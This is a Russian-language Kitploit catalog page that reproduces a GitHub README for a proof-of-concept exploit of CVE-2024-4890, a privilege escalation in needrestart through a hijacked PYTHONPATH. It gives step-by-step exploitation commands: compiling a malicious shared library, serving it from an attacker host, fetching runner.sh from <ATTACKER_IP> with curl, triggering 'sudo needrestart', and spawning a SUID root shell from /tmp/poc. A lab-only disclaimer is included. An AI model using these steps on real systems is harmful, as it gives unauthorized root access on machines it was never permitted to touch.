Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
needrestart-sudo-escalate-cve-2024-4890 — Эксплойт PoC для CVE-2024-4890: повышение привилегий через neecdrestart (>=3.8). Только для этических лабораторных исследований. Скрипты на Python и C. | Kitploit
Инструменты/GitHubGitHub/nekr0ff/needrestart-sudo-escalate-cve-2024-4890
Повышение привилегийАнализ уязвимостейЭксплуатацияОбучение и ОбразованиеЭксплуатация Бинарных ФайловЛаборатории и Практика
GitHubnekr0ff/needrestart-sudo-escalate-cve-2024-4890

needrestart-sudo-escalate-cve-2024-4890

Эксплойт PoC для CVE-2024-4890: повышение привилегий через neecdrestart (>=3.8). Только для этических лабораторных исследований. Скрипты на Python и C.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
310 месяцев назадЕщё не проверено

CVE-2024-4890: needrestart повышение привилегий через sudo PoC

CVE-2024-4890 License: MIT

Отказ от ответственности

Только для использования в лабораторных условиях в контролируемых средах. Не используйте эксплойт на производственных системах без явного разрешения. Данный PoC предназначен только для образовательных целей. Автор не несет ответственности за любое неправомерное использование или несанкционированный доступ.

Обзор

CVE-2024-4890 — это критическая уязвимость в needrestart (версии >= 3.8), которая позволяет выполнять произвольный код с повышенными привилегиями. Проблема вызвана небезопасной обработкой переменных окружения и конфигурационных файлов во время сканирования процессов.

В частности, при запуске с sudo, needrestart проверяет запущенные процессы Python, включая их переменную окружения PYTHONPATH. Злоумышленник может перехватить это, установив собственный PYTHONPATH, указывающий на контролируемый каталог (например, /tmp/attacker). Внутри этого каталога в поддельную структуру importlib помещается вредоносный модуль (__init__.so). Когда needrestart пытается импортировать его от имени root (для проверки библиотек), полезная нагрузка выполняется, предоставляя root-доступ.

Данный PoC демонстрирует эксплуатацию через приманку — процесс Python, вредоносную разделяемую библиотеку (скомпилированную из C) и скрипт автоматизации.

Предварительные требования

  • Цель: Система Linux с needrestart >= 3.8 и доступом к sudo.
  • Инструменты: gcc (для компиляции), curl, python3.

Структура файлов

Разместите их в /tmp/attacker на целевой машине.

  • e.py: Сценарий-приманка Python (работает в цикле, ожидает успешного выполнения полезной нагрузки).
  • runner.sh: Сценарий автоматизации для настройки и запуска приманки.

Шаги эксплуатации

  1. Машина атакующего: Скомпилируйте lib.c в __init__.so и разместите его:

gcc -shared -fPIC -o init.so lib.c

python3 -m http.server 8000

Целевая машина (Жертва):

  • Создайте каталог /tmp/attacker.
  • Скопируйте main.py
  • Загрузите и сделайте runner.sh исполняемым:
root@kitploit:~
curl http://<ATTACKER_IP>:<PORT>/runner.sh -o /tmp/attacker/runner.sh
chmod +x /tmp/attacker/runner.sh

Запустите настройку в одном терминале: cd /tmp/attacker && ./runner.sh

Это создает вредоносный модуль, скрипт-приманку и запускает перехваченный процесс Python.

  1. Запустите сканирование (в новом SSH-сеансе): sudo /usr/sbin/needrestart

needrestart обнаруживает процесс-приманку, считывает PYTHONPATH и импортирует вредоносный __init__.so от имени root — выполняя полезную нагрузку.

  1. Получите доступ (вернитесь в терминал с runner.sh):
  • Скрипт обнаруживает /tmp/poc (SUID-оболочка root, созданная полезной нагрузкой) и запускает root-оболочку: sudo /tmp/poc -p
  • Очистка: rm -rf /tmp/attacker /tmp/poc (и удалите запись sudoers, если она была добавлена).

Индикатор успеха: whoami показывает root или id показывает uid=0(root).

Скачать инструмент